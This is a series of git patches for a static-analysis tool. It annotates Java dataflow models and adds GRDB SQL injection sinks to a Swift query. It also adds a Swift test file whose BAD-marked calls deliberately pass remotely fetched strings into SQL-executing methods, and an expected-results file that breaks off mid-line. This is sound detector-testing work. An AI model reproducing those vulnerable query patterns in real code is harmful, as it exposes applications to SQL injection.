b/java/ql/lib/ext/java.math.model.yml index 8181f8e4861..c1e23e4204a 100644 --- a/java/ql/lib/ext/java.math.model.yml +++ b/java/ql/lib/ext/java.math.model.yml @@ -5,7 +5,7 @@ extensions: data: - ["java.math", "BigDecimal", False, "BigDecimal", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.math", "BigDecimal", False, "valueOf", "(double)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! consider making this signatureless and merging with the above line instead + - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] - addsTo: diff --git a/java/ql/lib/ext/java.sql.model.yml b/java/ql/lib/ext/java.sql.model.yml index 9dd0e7d948c..181d563bda9 100644 --- a/java/ql/lib/ext/java.sql.model.yml +++ b/java/ql/lib/ext/java.sql.model.yml @@ -28,4 +28,4 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.sql", "ResultSet", "next", "()", "manual"] + - ["java.sql", "ResultSet", "next", "()", "manual"] # ! unsure if should be neutral model diff --git a/java/ql/lib/ext/java.text.model.yml b/java/ql/lib/ext/java.text.model.yml index edf2a4c7d60..2e10bd3ac39 100644 --- a/java/ql/lib/ext/java.text.model.yml +++ b/java/ql/lib/ext/java.text.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.text", "DateFormat", "format", "(Date)", "manual"] - - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] + - ["java.text", "DateFormat", "format", "(Date)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? diff --git a/java/ql/lib/ext/java.time.model.yml b/java/ql/lib/ext/java.time.model.yml index 1a9b745f403..f363058c1db 100644 --- a/java/ql/lib/ext/java.time.model.yml +++ b/java/ql/lib/ext/java.time.model.yml @@ -4,5 +4,5 @@ extensions: extensible: neutralModel data: - ["java.time", "Instant", "now", "()", "manual"] - - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] + - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - ["java.time", "ZonedDateTime", "now", "()", "manual"] diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 44c01b611d2..8cf3a674da6 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ b/java/ql/lib/ext/java.util.function.model.yml @@ -9,11 +9,11 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! unsure if should be added as a MaD model and if model is correct - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] - addsTo: pack: codeql/java-all extensible: neutralModel data: - - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] + - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] # ! unsure if should be neutral model diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index ec45266409a..9d03874f179 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -369,7 +369,7 @@ extensions: - ["java.util", "Collections", "emptyList", "()", "manual"] - ["java.util", "Collections", "emptyMap", "()", "manual"] - ["java.util", "Collections", "emptySet", "()", "manual"] - - ["java.util", "Date", "Date", "(long)", "manual"] + - ["java.util", "Date", "Date", "(long)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - ["java.util", "Date", "getTime", "()", "manual"] - ["java.util", "Iterator", "hasNext", "()", "manual"] - ["java.util", "List", "clear", "()", "manual"] diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index aae79ed57ac..885b6e0f478 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -92,7 +92,7 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] + - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - ["java.util.stream", "Collectors", "toList", "()", "manual"] - - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] + - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - ["java.util.stream", "Collectors", "toSet", "()", "manual"] From ac39aeb6b675ebea313f49515c5abc786445992d Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 23 Dec 2022 17:03:31 +0100 Subject: [PATCH 073/381] Add SQLi sinks --- .../queries/Security/CWE-089/SqlInjection.ql | 74 ++++ .../query-tests/Security/CWE-089/GRDB.swift | 339 ++++++++++++++++++ .../Security/CWE-089/SqlInjection.expected | 242 +++++++++++++ 3 files changed, 655 insertions(+) create mode 100644 swift/ql/test/query-tests/Security/CWE-089/GRDB.swift diff --git a/swift/ql/src/queries/Security/CWE-089/SqlInjection.ql b/swift/ql/src/queries/Security/CWE-089/SqlInjection.ql index fcd6618658d..3fc44bc333a 100644 --- a/swift/ql/src/queries/Security/CWE-089/SqlInjection.ql +++ b/swift/ql/src/queries/Security/CWE-089/SqlInjection.ql @@ -63,6 +63,80 @@ class SQLiteSwiftSqlSink extends SqlSink { } } +/** A sink for the GRDB library. */ +class GrdbSqlSink extends SqlSink { + GrdbSqlSink() { + exists(CallExpr call, MethodDecl method | + call.getStaticTarget() = method and + call.getArgument(0).getExpr() = this.asExpr() + | + method + .hasQualifiedName("Database", + [ + "allStatements(sql:arguments:)", "cachedStatement(sql:)", + "internalCachedStatement(sql:)", "execute(sql:arguments:)", "makeStatement(sql:)", + "makeStatement(sql:prepFlags:)" + ]) + or + method + .hasQualifiedName("SQLRequest", + [ + "init(stringLiteral:)", "init(unicodeScalarLiteral:)", + "init(extendedGraphemeClusterLiteral:)", "init(stringInterpolation:)", + "init(sql:arguments:adapter:cached:)" + ]) + or + method + .hasQualifiedName("SQL", + [ + "init(stringLiteral:)", "init(unicodeScalarLiteral:)", + "init(extendedGraphemeClusterLiteral:)", "init(stringInterpolation:)", + "init(sql:arguments:)", "append(sql:arguments:)" + ]) + or + method + .hasQualifiedName("TableDefinition", ["column(sql:)", "check(sql:)", "constraint(sql:)"]) + or + method.hasQualifiedName("TableAlteration", "addColumn(sql:)") + or + method + .hasQualifiedName("ColumnDefinition", + ["check(sql:)", "defaults(sql:)", "generatedAs(sql:_:)"]) + or + method + .hasQualifiedName("TableRecord", + [ + "select(sql:arguments:)", "select(sql:arguments:as:)", "filter(sql:arguments:)", + "order(sql:arguments:)" + ]) + or + method.hasQualifiedName("StatementCache", "statement(_:)") + ) + or + exists(CallExpr call, MethodDecl method | + call.getStaticTarget() = method and + call.getArgument(1).getExpr() = this.asExpr() + | + method + .hasQualifiedName(["Row", "DatabaseValueConvertible"], + [ + "fetchCursor(_:sql:arguments:adapter:)", "fetchAll(_:sql:arguments:adapter:)", + "fetchSet(_:sql:arguments:adapter:)", "fetchOne(_:sql:arguments:adapter:)" + ]) + or + method.hasQualifiedName("SQLStatementCursor", "init(database:sql:arguments:prepFlags:)") + ) + or + exists(CallExpr call, MethodDecl method | + call.getStaticTarget() = method and + call.getArgument(3).getExpr() = this.asExpr() + | + method + .hasQualifiedName("CommonTableExpression", "init(recursive:named:columns:sql:arguments:)") + ) + } +} + /** * A taint configuration for tainted data that reaches a SQL sink. */ diff --git a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift new file mode 100644 index 00000000000..a680176bf89 --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift @@ -0,0 +1,339 @@ +// --- stubs --- + +struct URL +{ + init?(string: String) {} +} + +extension String { + init(contentsOf: URL) throws { + let data = "" + + // ... + + self.init(data) + } +} + +struct StatementArguments {} +class Statement {} +protocol RowAdapter {} +class RowDecoder {} +enum GeneratedColumnQualification { case virtual } +struct QueryInterfaceRequest {} + +class Database { + func allStatements(sql: String, arguments: StatementArguments? = nil) -> SQLStatementCursor { return SQLStatementCursor(database: self, sql: "", arguments: nil) } + func cachedStatement(sql: String) -> Statement { return Statement() } + func internalCachedStatement(sql: String) -> Statement { return Statement() } + func execute(sql: String, arguments: StatementArguments = StatementArguments()) {} + func makeStatement(sql: String) -> Statement { return Statement() } + func makeStatement(sql: String, prepFlags: CUnsignedInt) -> Statement { return Statement() } +} + +struct SQLRequest { + init(stringLiteral: String) {} + init(unicodeScalarLiteral: String) {} + init(extendedGraphemeClusterLiteral: String) {} + init(stringInterpolation: String) {} + init(sql: String, arguments: StatementArguments = StatementArguments(), adapter: (any RowAdapter)? = nil, cached: Bool = false) {} +} + +struct SQL { + init(stringLiteral: String) {} + init(unicodeScalarLiteral: String) {} + init(extendedGraphemeClusterLiteral: String) {} + init(stringInterpolation: String) {} + init(sql: String, arguments: StatementArguments = StatementArguments()) {} + func append(sql: String, arguments: StatementArguments = StatementArguments()) {} +} + +class TableDefinition { + func column(sql: String) {} + func check(sql: String) {} + func constraint(sql: String) {} +} + +class TableAlteration { + func addColumn(sql: String) {} +} + +class ColumnDefinition { + func check(sql: String) -> Self { return self } + func defaults(sql: String) -> Self { return self } + func generatedAs(sql: String, _: GeneratedColumnQualification = .virtual) -> Self { return self } +} + +class TableRecord { + static func select(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } + static func select(sql: String, arguments: StatementArguments = StatementArguments(), as: RowDecoder.Type = RowDecoder.self) -> QueryInterfaceRequest{ QueryInterfaceRequest() } + static func filter(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } + static func order(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } +} + +struct StatementCache { + func statement(_: String) -> Statement { return Statement() } +} + +class Row { + func fetchCursor(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} +} + +class DatabaseValueConvertible { + func fetchCursor(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} +} + +class SQLStatementCursor { + init(database: Database, sql: String, arguments: StatementArguments?, prepFlags: CUnsignedInt = 0) {} +} + +class CommonTableExpression { + init(recursive: Bool = false, named: String, columns: [String]? = nil, sql: String, arguments: StatementArguments = StatementArguments()) {} +} + +// --- tests --- + +func test(database: Database) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = database.allStatements(sql: remoteString) // BAD + let _ = database.allStatements(sql: localString) // GOOD + let _ = database.allStatements(sql: remoteString, arguments: nil) // BAD + let _ = database.allStatements(sql: localString, arguments: nil) // GOOD + + let _ = database.cachedStatement(sql: remoteString) // BAD + let _ = database.cachedStatement(sql: localString) // GOOD + + let _ = database.internalCachedStatement(sql: remoteString) // BAD + let _ = database.internalCachedStatement(sql: localString) // GOOD + + database.execute(sql: remoteString) // BAD + database.execute(sql: localString) // GOOD + database.execute(sql: remoteString, arguments: StatementArguments()) // BAD + database.execute(sql: localString, arguments: StatementArguments()) // GOOD + + let _ = database.makeStatement(sql: remoteString) // BAD + let _ = database.makeStatement(sql: localString) // GOOD + let _ = database.makeStatement(sql: remoteString, prepFlags: 0) // BAD + let _ = database.makeStatement(sql: localString, prepFlags: 0) // GOOD +} + +func testSqlRequest() throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = SQLRequest(stringLiteral: remoteString) // BAD + let _ = SQLRequest(stringLiteral: localString) // GOOD + + let _ = SQLRequest(unicodeScalarLiteral: remoteString) // BAD + let _ = SQLRequest(unicodeScalarLiteral: localString) // GOOD + + let _ = SQLRequest(extendedGraphemeClusterLiteral: remoteString) // BAD + let _ = SQLRequest(extendedGraphemeClusterLiteral: localString) // GOOD + + let _ = SQLRequest(stringInterpolation: remoteString) // BAD + let _ = SQLRequest(stringInterpolation: localString) // GOOD + + let _ = SQLRequest(sql: remoteString) // BAD + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), cached: false) // BAD + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil, cached: false) // BAD + let _ = SQLRequest(sql: remoteString, adapter: nil) // BAD + let _ = SQLRequest(sql: remoteString, adapter: nil, cached: false) // BAD + let _ = SQLRequest(sql: remoteString, cached: false) // BAD + let _ = SQLRequest(sql: localString) // GOOD + let _ = SQLRequest(sql: localString, arguments: StatementArguments()) // GOOD + let _ = SQLRequest(sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + let _ = SQLRequest(sql: localString, arguments: StatementArguments(), cached: false) // GOOD + let _ = SQLRequest(sql: localString, arguments: StatementArguments(), adapter: nil, cached: false) // GOOD + let _ = SQLRequest(sql: localString, adapter: nil) // GOOD + let _ = SQLRequest(sql: localString, adapter: nil, cached: false) // GOOD + let _ = SQLRequest(sql: localString, cached: false) // GOOD +} + +func test(tableDefinition: TableDefinition) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + tableDefinition.column(sql: remoteString) // BAD + tableDefinition.column(sql: localString) // GOOD + + tableDefinition.check(sql: remoteString) // BAD + tableDefinition.check(sql: localString) // GOOD + + tableDefinition.constraint(sql: remoteString) // BAD + tableDefinition.constraint(sql: localString) // GOOD +} + +func test(tableAlteration: TableAlteration) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + tableAlteration.addColumn(sql: remoteString) // BAD + tableAlteration.addColumn(sql: localString) // GOOD +} + +func test(columnDefinition: ColumnDefinition) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = columnDefinition.check(sql: remoteString) // BAD + let _ = columnDefinition.defaults(sql: remoteString) // BAD + let _ = columnDefinition.generatedAs(sql: remoteString) // BAD + let _ = columnDefinition.generatedAs(sql: remoteString, .virtual) // BAD + + let _ = columnDefinition.check(sql: localString) // GOOD + let _ = columnDefinition.defaults(sql: localString) // GOOD + let _ = columnDefinition.generatedAs(sql: localString) // GOOD + let _ = columnDefinition.generatedAs(sql: localString, .virtual) // GOOD +} + +func testTableRecord() throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = TableRecord.select(sql: remoteString) // BAD + let _ = TableRecord.select(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.select(sql: localString) // GOOD + let _ = TableRecord.select(sql: localString, arguments: StatementArguments()) // GOOD + + let _ = TableRecord.filter(sql: remoteString) // BAD + let _ = TableRecord.filter(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.filter(sql: localString) // GOOD + let _ = TableRecord.filter(sql: localString, arguments: StatementArguments()) // GOOD + + let _ = TableRecord.order(sql: remoteString) // BAD + let _ = TableRecord.order(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.order(sql: localString) // GOOD + let _ = TableRecord.order(sql: localString, arguments: StatementArguments()) // GOOD +} + +func test(statementCache: StatementCache) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = statementCache.statement(remoteString) // BAD + let _ = statementCache.statement(localString) // GOOD +} + +func test(row: Row, stmt: Statement) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + row.fetchCursor(stmt, sql: remoteString) // BAD + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + row.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchCursor(stmt, sql: localString) // GOOD + row.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD + row.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD + row.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + row.fetchAll(stmt, sql: remoteString) // BAD + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + row.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchAll(stmt, sql: localString) // GOOD + row.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD + row.fetchAll(stmt, sql: localString, adapter: nil) // GOOD + row.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + row.fetchOne(stmt, sql: remoteString) // BAD + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + row.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchOne(stmt, sql: localString) // GOOD + row.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD + row.fetchOne(stmt, sql: localString, adapter: nil) // GOOD + row.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + row.fetchSet(stmt, sql: remoteString) // BAD + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + row.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchSet(stmt, sql: localString) // GOOD + row.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD + row.fetchSet(stmt, sql: localString, adapter: nil) // GOOD + row.fetchSet(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD +} + +func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + databaseValueConvertible.fetchCursor(stmt, sql: remoteString) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: localString) // GOOD + databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD + databaseValueConvertible.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD + databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + databaseValueConvertible.fetchAll(stmt, sql: remoteString) // BAD + databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + databaseValueConvertible.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD + databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchAll(stmt, sql: localString) // GOOD + databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD + databaseValueConvertible.fetchAll(stmt, sql: localString, adapter: nil) // GOOD + databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + databaseValueConvertible.fetchOne(stmt, sql: remoteString) // BAD + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + databaseValueConvertible.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchOne(stmt, sql: localString) // GOOD + databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD + databaseValueConvertible.fetchOne(stmt, sql: localString, adapter: nil) // GOOD + databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD + + databaseValueConvertible.fetchSet(stmt, sql: remoteString) // BAD + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD + databaseValueConvertible.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchSet(stmt, sql: localString) // GOOD + databaseValueConvertible.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD + databaseValueConvertible.fetchSet(stmt, sql: localString, adapter: nil) // GOOD + databaseValueConvertible.fetchSet(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD +} + +func testSqlStatementCursor(database: Database) throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments()) // BAD + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments(), prepFlags: 0) // BAD + let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments()) // GOOD + let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments(), prepFlags: 0) // GOOD +} + +func testCommonTableExpression() throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = CommonTableExpression(named: "", sql: remoteString) // BAD + let _ = CommonTableExpression(named: "", sql: remoteString, arguments: StatementArguments()) // BAD + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString) // BAD + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString) // BAD + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString) // BAD + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString, arguments: StatementArguments()) // BAD + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD + let _ = CommonTableExpression(named: "", sql: localString) // GOOD + let _ = CommonTableExpression(named: "", sql: localString, arguments: StatementArguments()) // GOOD + let _ = CommonTableExpression(named: "", columns: [""], sql: localString) // GOOD + let _ = CommonTableExpression(named: "", columns: [""], sql: localString, arguments: StatementArguments()) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", sql: localString) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: localString) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", sql: localString, arguments: StatementArguments()) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: localString, arguments: StatementArguments()) // GOOD +} diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 2b8d3783854..bc60c3508ff 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -1,4 +1,81 @@ edges +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:106:41:106:41 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:108:41:108:41 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:111:43:111:43 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:114:51:114:51 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:117:27:117:27 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:119:27:119:27 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:122:41:122:41 | remoteString | +| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) : | GRDB.swift:124:41:124:41 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:132:39:132:39 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:135:46:135:46 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:138:56:138:56 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:141:45:141:45 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:144:29:144:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:145:29:145:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:146:29:146:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:147:29:147:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:148:29:148:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:149:29:149:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:150:29:150:29 | remoteString | +| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:151:29:151:29 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:33:166:33 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:32:169:32 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:37:172:37 | remoteString | +| GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | GRDB.swift:180:36:180:36 | remoteString | +| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:188:41:188:41 | remoteString | +| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:189:44:189:44 | remoteString | +| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:190:47:190:47 | remoteString | +| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:191:47:191:47 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:203:37:203:37 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:204:37:204:37 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:208:37:208:37 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:209:37:209:37 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:213:36:213:36 | remoteString | +| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:214:36:214:36 | remoteString | +| GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | GRDB.swift:223:38:223:38 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:231:32:231:32 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:232:32:232:32 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:233:32:233:32 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:234:32:234:32 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:240:29:240:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:241:29:241:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:242:29:242:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:243:29:243:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:249:29:249:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:250:29:250:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:251:29:251:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:252:29:252:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:258:29:258:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:259:29:259:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:260:29:260:29 | remoteString | +| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | +| 